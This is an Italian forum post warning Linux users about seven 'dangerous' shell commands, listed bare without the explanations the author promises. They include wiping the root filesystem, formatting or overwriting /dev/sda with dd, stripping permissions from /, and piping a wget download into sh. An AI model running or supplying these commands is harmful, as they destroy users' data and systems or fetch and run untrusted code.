Mi annoio, non so che fare. Creo dunque questo post per "avvertire" o meglio, informare gli utenti che non sono a conoscenza di ciò che scriverò nelle prossime righe. Premetto che molti utenti ( o persone con cui ho parlato ) affermano che su Linux non esistono virus, è vero, hanno ragione, su Linux non esistono virus. Perchè ? Molti direbbero : perchè è un sistema GNU/Linux. Io rispondo sempre loro : cosa significa ? non ha senso..Di fatti non ha senso. Linux nasce come sistema operativo versatile con cui poter fare ciò che non si può fare su Windows, e cioè ? La personalizzazione del proprio sistema operativo. Linux offre moltissimi tool ( per i meno esperti ) o un magnifico programma ( perchè effettivamente è un programma ) con cui interagire con il sistema operativo ( sì, parlo del terminale ). Questa era una piccola parentesi che volevo aprire, andiamo invece a vedere l'argomento principale di questo thread : comandi pericolosi su Linux. Come detto prima, i virus non esistono, ma nessuno vieta ad un povero ignorante ( che di ignoranza non ne ha, ciò che conta è il suo intento ) di creare uno script .sh ( bash, linguaggio di scripting che worka su linux, molto usato ) in cui ci sono scritti comandi che il sistema operativo. Mano a mano che elencerò i comandi darò anche una breve, nonchè utile, descrizione di ciò che fa ognuno di essi. I comandi che sono scritti di seguito sono solo 7, quelli più "pericolosi" che conosco :
Fonte : Mia
Alla prossima.
- rm -rfv /
- mkfs.ext3 /dev/sda
- chown nobody:nobody -R /
chmod 000 -R /
- wget Perfavore, Entra oppure Registrati per vedere i Link!-O- | sh
- mv /home/directory_home/* /dev/null
- dd if=/dev/urandom of=/dev/sda
dd if=/dev/random of=/dev/sda
dd if=/dev/zero of=/dev/sda
- any_command > /dev/sda